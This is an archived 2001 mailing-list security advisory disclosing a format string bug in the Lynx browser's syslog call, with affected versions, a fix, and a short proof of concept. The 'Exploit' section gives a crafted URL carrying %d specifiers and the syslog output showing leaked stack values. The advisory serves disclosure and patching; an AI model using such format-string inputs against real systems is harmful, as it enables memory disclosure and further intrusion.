OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Larry W. Cashdollar (lwcvapid.dhs.org)
Date: Thu Dec 27 2001 - 11:23:01 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    The vendor has been notified, but since this is a low risk I am
    releasing early.

                                    Vapid Labs
                                Larry W. Cashdollar
                                    Bug Report

    Summary: lynx has a format string vulnerability in LYUtils.c line 7995 due
             to a bad call to syslog(), where the format argument is omitted.

    Risk: Low

    Version: Lynx compiled from FreeBSD ports collection. Also tested in
    2.8.5dev.5.gz

    [larrycharod ~ $] lynx --version
    Lynx Version 2.8.4rel.1 (17 Jul 2001)
    Built on freebsd4.4 Dec 25 2001 23:04:31

    Details:

    line 7995 in LYUtils.c reads:
    syslog (LOG_INFO|LOG_LOCAL5, buf);

    The reason this is low priority is the bug can only big triggered if
    sysloging URL's is enabled.
    (./configure --enable-syslog)

    Exploit:

    The following url triggers the bug:

    [larrycharod ~ $] lynx vapid.dhs.org/bleh:80">http://lwc%d%d:hsVd632kvapid.dhs.org/bleh:80

    Results in the following logged to syslog.

    Dec 25 23:11:00 vapid lynx[5160]: vapid.dhs.org/bleh:80">http://lwc-1077939384134744128:******vapid.dhs.org/bleh:80

    Fix:

    line 7995:
    - -syslog (LOG_INFO|LOG_LOCAL5, buf);
    +syslog (LOG_INFO|LOG_LOCAL5,"%s", buf);

    Larry W. Cashdollar
    http://vapid.dhs.org

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.6 (FreeBSD)
    Comment: For info see http://www.gnupg.org

    iD8DBQE8K1iX1hSQ6Gxh/KoRAiiXAJ9y89t6QYewx2tCiHT8JwsplvLMsgCfQBDD
    mrfnwVrdUUNRaKLdGIOtWfI=
    =sNDc
    -----END PGP SIGNATURE-----